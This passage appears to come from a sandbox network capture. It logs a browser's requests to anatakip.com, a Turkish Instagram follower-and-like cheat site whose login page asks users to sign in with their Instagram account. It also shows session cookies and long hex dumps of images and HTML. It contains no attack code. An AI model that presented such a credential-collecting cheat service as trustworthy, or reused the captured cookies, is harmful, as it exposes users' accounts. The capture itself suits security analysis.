                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:39 UTC432INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:39 GMT
                    Content-Type: image/png
                    Content-Length: 1522
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:09 GMT
                    etag: "4c149ecd-5f2"
                    expires: Wed, 15 May 2024 16:08:16 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 1061363
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15d8c2df872a4-EWR
                    2024-05-26 22:57:39 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 bb 50 4c 54 45 ff ff ff 90 90 90 c8 c8 c8 ae ae ae e4 e4 e4 8e 8e 8e d2 d2 d2 c1 c1 c1 ea ea ea bc bc bc 8d 8d 8d 8b 8b 8b 72 72 72 c6 c6 c6 e2 e2 e2 c7 c7 c7 ac ac ac e3 e3 e3 93 93 93 c9 c9 c9 bb bb bb e8 e8 e8 99 99 99 ad ad ad 70 70 70 d4 d4 d4 92 92 92 a8 a8 a8 be be be 7d 7d 7d 7a 7a 7a 77 77 77 a2 a2 a2 b9 b9 b9 d0 d0 d0 74 74 74 b7 b7 b7 e7 e7 e7 cf cf cf ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6 26 2c 88 37 3b 7f 37 3b 52 4a 4a 8c 23 27 b6 26 2b 5b 21 24 a4 5c 5f b7 26 2c 53 19 1b 32 1f 20 9a 27 2b 57
                    Data Ascii: PNGIHDRQpPLTErrrppp}}}zzzwwwttt\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX&,7;7;RJJ#'&+[!$\_&,S2 '+W
                    2024-05-26 22:57:39 UTC585INData Raw: e4 d9 02 6c f9 f9 ef d8 a7 2f 1b 98 55 60 69 c8 60 6c 50 7b 15 19 c9 d1 42 94 c7 23 a0 88 37 1a 8d 73 d7 fd 24 9e 18 8d e4 b1 e0 ac 91 2d 08 0e 0c 0c 0c 0c 30 57 01 b0 b7 45 87 49 41 3d 02 d1 d5 4a ad f6 f5 2f 62 df 81 a7 9b 99 70 64 bc 96 c5 1f fa 77 14 1e b0 17 7b bf 5d a6 1c bf a3 3c 49 37 ab 85 78 a3 d3 e9 ce 30 a9 65 a5 8e 65 00 1c f0 27 f7 fc 2b b3 45 e2 77 2c ce ce 33 7c 68 c0 96 18 ee 1a 0c a6 d8 70 cf c0 e2 07 fb f7 f3 f5 63 a2 2f f4 65 ef 76 10 8b 11 a0 93 e8 d2 ed 4d 58 6a 4a 2a 4d cf db b5 90 e4 a6 14 fa 5f d1 90 f0 61 92 0f fd 5f 92 d2 83 08 18 aa a4 a5 cf 1b b1 92 b8 12 5e 49 63 1c 6f 32 29 0e 73 1c 05 de 5e b0 2f 8f e7 05 7b 38 38 78 79 73 1e 16 62 83 b4 02 81 02 19 15 d6 4c 9c 5c a6 54 6e 6a 6e 3e be 9a 14 73 94 5c 3c 3d 94 ca ee 10 7a 7a
                    Data Ascii: l/U`i`lP{B#7s$-0WEIA=J/bpdw{]<I7x0ee'+Ew,3|hpc/evMXjJ*M_a_^Ico2)s^/{88xysbL\Tnjn>s\<=zz


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    28192.168.2.549750104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:39 UTC359OUTGET /classic/14/1431.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: */*
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: cors
                    Sec-Fetch-Dest: empty
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:39 UTC431INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:39 GMT
                    Content-Type: image/png
                    Content-Length: 1602
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:11 GMT
                    etag: "4c149ecf-642"
                    expires: Sat, 18 May 2024 18:22:22 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 794117
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15d8d6bcd8cba-EWR
                    2024-05-26 22:57:39 UTC938INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 c7 50 4c 54 45 ff ff ff c6 c6 c6 e3 e3 e3 bf bf bf 77 77 77 b9 b9 b9 e7 e7 e7 88 88 88 74 74 74 e4 e4 e4 ae ae ae c9 c9 c9 8e 8e 8e 99 99 99 d6 d6 d6 ea ea ea 80 80 80 95 95 95 d3 d3 d3 e9 e9 e9 7a 7a 7a d1 d1 d1 e1 e1 e1 c7 c7 c7 76 76 76 72 72 72 e2 e2 e2 90 90 90 92 92 92 93 93 93 a5 a5 a5 ad ad ad aa aa aa a8 a8 a8 a6 a6 a6 a4 a4 a4 8d 8d 8d e8 e8 e8 a2 a2 a2 d0 d0 d0 70 70 70 cf cf cf a0 a0 a0 ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6 26 2c 88 37 3b 7f 37 3b 52 4a 4a 8c 23 27 b6 26 2b 5b 21 24 a4 5c 5f b7
                    Data Ascii: PNGIHDRQpPLTEwwwtttzzzvvvrrrppp\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX&,7;7;RJJ#'&+[!$\_
                    2024-05-26 22:57:39 UTC664INData Raw: cf b2 f3 bd 62 ff 9f cb 82 51 76 82 91 18 b9 f1 13 71 eb e1 24 76 1a f3 44 36 8a 30 fa 8a 6c 4b cf 92 25 98 48 f5 5c ca 35 8c 6c d7 bc 5e 6f ff 09 5f a8 a3 5e 2f 0d 83 d6 7b 25 7c 43 80 06 5e 1f 0d 80 a7 a1 54 71 a2 04 34 54 cf bd fc 88 d1 85 74 bb cb 75 e6 07 b5 60 d1 b1 a9 2c 59 d6 d1 45 65 84 87 d7 87 7a 2e 1f e1 55 fe e6 55 a0 98 7a ee 49 36 b9 c6 ec db 62 9f 9f d4 59 51 14 d7 b1 ec e7 68 91 d2 85 5b 44 d0 89 6a 3a a8 2c 6a 2c 4a ae f1 99 6b 4b ae 31 31 e1 b9 e7 ea 57 62 98 67 bf c7 23 a5 5f 0f 78 14 50 d7 a3 56 29 94 34 b5 2c d5 42 a8 ef 1c cf 63 24 dc 16 92 67 7e 27 ee df bb 2f 08 03 e6 0c a6 f9 f7 7b 82 0c c2 04 95 10 a8 28 5c 80 10 96 07 01 04 a9 e7 ac c9 8b 31 f2 a4 65 26 9f f8 46 24 5d 49 d2 27 7d bb a2 ef 4a 8b a5 ca ef 1f ea a8 9f 07 15 ca eb
                    Data Ascii: bQvq$vD60lK%H\5l^o_^/{%|C^Tq4Ttu`,YEez.UUzI6bYQh[Dj:,j,JkK11Wbg#_xPV)4,Bc$g~'/{(\1e&F$]I'}J


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    29192.168.2.549752104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:39 UTC734OUTGET /assets/logo/favicon.png HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _ga=GA1.2.1095029423.1716764258; _gid=GA1.2.1885107992.1716764258
                    2024-05-26 22:57:40 UTC746INHTTP/1.1 404 Not Found
                    Date: Sun, 26 May 2024 22:57:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: BYPASS
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5OhWWbWwE36lOMAtD4trA9J1RU9enj%2FEj7Ef9UoXEpbVTKNYAoJCuYndNPhjZ9V1Pu10Qh4eMIYgJIz3LELA8%2BcFM9IQSMlfMh%2BtAPBe%2FpmXYJHC5KLBBVHg%2F%2BMJ7EU%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15d907eed42b0-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:40 UTC623INData Raw: 31 63 37 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 70 61
                    Data Ascii: 1c75<!DOCTYPE html><html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="/assets/bootstrap/css/bootstrap-pa
                    2024-05-26 22:57:40 UTC1369INData Raw: 73 73 65 74 73 2f 73 74 79 6c 65 2f 70 61 70 65 72 2e 63 73 73 3f 76 3d 76 33 2e 31 2e 35 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6e 70 72 6f 67 72 65 73 73 2f 6e 70 72 6f 67 72 65 73 73 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 41 6e 61 54 61 6b 69 70 20 6b 65 6e 64 69 6e 69 7a 69 20 69 6e 73 74 61 67 72 61 6d 20 65 6e 20 69 79 69 20 70 72 6f 66 69 6c 69 20 68 61 6c 69 6e 65 20 67 65 74
                    Data Ascii: ssets/style/paper.css?v=v3.1.5"><link rel="stylesheet" href="/assets/nprogress/nprogress.css"><link rel="shortcut icon" href="/assets/logo/favicon.png" type="image/x-icon" /><title>Page Not Found | AnaTakip kendinizi instagram en iyi profili haline get
                    2024-05-26 22:57:40 UTC1369INData Raw: 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 54 6f 67 67 6c 65 20 6e 61 76 69 67 61 74 69 6f 6e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 20 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 6c 65 66 74 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d
                    Data Ascii: bar-collapse" aria-expanded="false"><span class="sr-only">Toggle navigation</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button></div><div class="navbar-collapse collapse navbar-left"><ul class=
                    2024-05-26 22:57:40 UTC1369INData Raw: 33 22 3e 0a 3c 68 35 3e 4b 69 6d 6c 65 72 20 4b 75 6c 6c 61 6e 61 62 69 6c 69 72 3c 2f 68 35 3e 0a 3c 70 3e 49 6e 73 74 61 67 72 61 6d 20 c3 bc 79 65 6c 69 c4 9f 69 20 6f 6c 61 6e 20 68 65 72 6b 65 73 20 73 69 73 74 65 6d 69 20 6b 75 6c 6c 61 6e 61 62 69 6c 69 72 2e 20 49 6e 73 74 61 67 72 61 6d 20 68 65 73 61 62 c4 b1 6e c4 b1 7a 6c 61 20 67 69 72 69 c5 9f 20 79 61 70 c4 b1 6e 20 76 65 20 68 65 6d 65 6e 20 6b 75 6c 6c 61 6e 6d 61 79 61 20 62 61 c5 9f 6c 61 79 c4 b1 6e 2e 20 4b 75 6c 6c 61 6e c4 b1 6d 20 c3 bc 63 72 65 74 73 69 7a 64 69 72 2e 20 4b 72 65 64 69 20 73 61 74 c4 b1 6e 20 61 6c 6d 61 64 c4 b1 6b c3 a7 61 20 68 69 c3 a7 62 69 72 20 c3 bc 63 72 65 74 20 c3 b6 64 65 6d 65 7a 73 69 6e 69 7a 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63
                    Data Ascii: 3"><h5>Kimler Kullanabilir</h5><p>Instagram yelii olan herkes sistemi kullanabilir. Instagram hesabnzla giri yapn ve hemen kullanmaya balayn. Kullanm cretsizdir. Kredi satn almadka hibir cret demezsiniz.</p></div><div c
                    2024-05-26 22:57:40 UTC1369INData Raw: 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 63 6f 72 65 2f 63 6f 72 65 2e 6a 73 3f 76 3d 33 2e 31 2e 31 30 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 09 09 09 28 66 75 6e 63 74 69 6f 6e 20 28 69 2c 20 73 2c 20 6f 2c 20 67 2c 20 72 2c 20 61 2c 20 6d 29 20 7b 0a 09 09 09 09 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 20 3d 20 72 3b 0a 09 09 09 09 69 5b 72 5d 20 3d 20 69 5b 72 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 09 09 09 28 69 5b 72 5d 2e 71 20 3d 20 69 5b 72 5d 2e 71 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 0a 09 09 09 09 7d 2c 20
                    Data Ascii: script><script src="/assets/core/core.js?v=3.1.10"></script><script type="text/javascript">(function (i, s, o, g, r, a, m) {i['GoogleAnalyticsObject'] = r;i[r] = i[r] || function () {(i[r].q = i[r].q || []).push(arguments)},
                    2024-05-26 22:57:40 UTC1194INData Raw: 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 61 61 61 61 61 61 3b 0a 09 09 09 09 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6c 6f 73 65 3a 68 6f 76 65 72 2c 0a 09 09 09 2e 63 6c 6f 73 65 3a 66 6f 63 75 73 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 09 09 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 09 09 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 6d 6f 64 61 6c 2d 6f 70 65 6e 20 2e 6d 6f 64 61 6c 20 7b 0a 09 09 09 09 6f 76 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 0a 09 09 09 09 6f 76 65 72 66 6c
                    Data Ascii: {color: #aaaaaa;float: right;font-size: 28px;font-weight: bold;}.close:hover,.close:focus {color: #000;text-decoration: none;cursor: pointer;}.modal-open .modal {overflow-x: hidden;overfl
                    2024-05-26 22:57:40 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                    Data Ascii: 1
                    2024-05-26 22:57:40 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    30192.168.2.549753104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:39 UTC357OUTGET /classic/00/56.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: */*
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: cors
                    Sec-Fetch-Dest: empty
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:39 UTC432INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:39 GMT
                    Content-Type: image/png
                    Content-Length: 1522
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:09 GMT
                    etag: "4c149ecd-5f2"
                    expires: Wed, 15 May 2024 16:08:16 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 1061363
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15d908ede43fa-EWR
                    2024-05-26 22:57:39 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 bb 50 4c 54 45 ff ff ff 90 90 90 c8 c8 c8 ae ae ae e4 e4 e4 8e 8e 8e d2 d2 d2 c1 c1 c1 ea ea ea bc bc bc 8d 8d 8d 8b 8b 8b 72 72 72 c6 c6 c6 e2 e2 e2 c7 c7 c7 ac ac ac e3 e3 e3 93 93 93 c9 c9 c9 bb bb bb e8 e8 e8 99 99 99 ad ad ad 70 70 70 d4 d4 d4 92 92 92 a8 a8 a8 be be be 7d 7d 7d 7a 7a 7a 77 77 77 a2 a2 a2 b9 b9 b9 d0 d0 d0 74 74 74 b7 b7 b7 e7 e7 e7 cf cf cf ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6 26 2c 88 37 3b 7f 37 3b 52 4a 4a 8c 23 27 b6 26 2b 5b 21 24 a4 5c 5f b7 26 2c 53 19 1b 32 1f 20 9a 27 2b 57
                    Data Ascii: PNGIHDRQpPLTErrrppp}}}zzzwwwttt\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX&,7;7;RJJ#'&+[!$\_&,S2 '+W
                    2024-05-26 22:57:39 UTC585INData Raw: e4 d9 02 6c f9 f9 ef d8 a7 2f 1b 98 55 60 69 c8 60 6c 50 7b 15 19 c9 d1 42 94 c7 23 a0 88 37 1a 8d 73 d7 fd 24 9e 18 8d e4 b1 e0 ac 91 2d 08 0e 0c 0c 0c 0c 30 57 01 b0 b7 45 87 49 41 3d 02 d1 d5 4a ad f6 f5 2f 62 df 81 a7 9b 99 70 64 bc 96 c5 1f fa 77 14 1e b0 17 7b bf 5d a6 1c bf a3 3c 49 37 ab 85 78 a3 d3 e9 ce 30 a9 65 a5 8e 65 00 1c f0 27 f7 fc 2b b3 45 e2 77 2c ce ce 33 7c 68 c0 96 18 ee 1a 0c a6 d8 70 cf c0 e2 07 fb f7 f3 f5 63 a2 2f f4 65 ef 76 10 8b 11 a0 93 e8 d2 ed 4d 58 6a 4a 2a 4d cf db b5 90 e4 a6 14 fa 5f d1 90 f0 61 92 0f fd 5f 92 d2 83 08 18 aa a4 a5 cf 1b b1 92 b8 12 5e 49 63 1c 6f 32 29 0e 73 1c 05 de 5e b0 2f 8f e7 05 7b 38 38 78 79 73 1e 16 62 83 b4 02 81 02 19 15 d6 4c 9c 5c a6 54 6e 6a 6e 3e be 9a 14 73 94 5c 3c 3d 94 ca ee 10 7a 7a
                    Data Ascii: l/U`i`lP{B#7s$-0WEIA=J/bpdw{]<I7x0ee'+Ew,3|hpc/evMXjJ*M_a_^Ico2)s^/{88xysbL\Tnjn>s\<=zz


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    31192.168.2.549756104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:41 UTC782OUTGET /login HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    sec-ch-ua-platform: "Windows"
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: navigate
                    Sec-Fetch-Dest: document
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _ga=GA1.2.1095029423.1716764258; _gid=GA1.2.1885107992.1716764258
                    2024-05-26 22:57:41 UTC736INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2CL%2FeVt722VNFRvLCO8sNq4rJtZpAOujKPKCcaQ7C6ZzPUDugs2AORQygGPEvi%2BPOU%2F5GtRIOY%2Bi0IafHQtvsKYB3GzafLHLw03kuEZfM4OvVPXDy2cvTtsvVm4g7CI%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15d9a0cbbc41b-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:41 UTC633INData Raw: 33 34 62 33 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 74 69 74 6c 65 3e 4c 6f 67 69 6e 20 7c 20 41 6e 61 54 61 6b 69 70 20 6b 65 6e 64 69 6e 69 7a 69 20 69 6e 73 74 61 67 72 61 6d 20 65 6e 20 69 79 69 20 70 72 6f 66 69 6c 69 20 68 61 6c 69 6e 65 20 67 65 74 69 72 69 6e 20 2c 20 c4 b0 6e 73 74 61 67 72 61 6d 20 74 61 6b 69 70 c3 a7 69 20 68 69 6c 65 73 69 20 2c 20 69 6e 73 74 61 67 72 61 6d 20 62 65 c4 9f 65 6e 69 20 68 69 6c 65 73 69 2c 20 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e
                    Data Ascii: 34b3<html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>Login | AnaTakip kendinizi instagram en iyi profili haline getirin , nstagram takipi hilesi , instagram beeni hilesi, </title><meta n
                    2024-05-26 22:57:41 UTC1369INData Raw: 61 73 73 35 22 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 22 69 6e 73 74 61 63 6c 61 73 73 34 20 69 6e 73 74 61 63 6c 61 73 73 33 30 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 3c 61 72 74 69 63 6c 65 20 63 6c 61 73 73 3d 22 69 6e 73 74 61 61 72 74 69 63 6c 65 33 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 73 74 61 63 6c 61 73 73 31 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 73 74 61 63 6c 61 73 73 32 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 20 31 35 70 78 20 32 30 70 78 20 31 35 70 78 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 31 30 70 78 3b 0a 20 20 20 20 6c 69 6e 65 2d 68
                    Data Ascii: ass5"><main class="instaclass4 instaclass30" role="main"><article class="instaarticle3"><div class="instaclass1"><div class="instaclass2"><div style="padding: 15px 20px 15px; text-align: center; color: white; margin-top: -10px; line-h
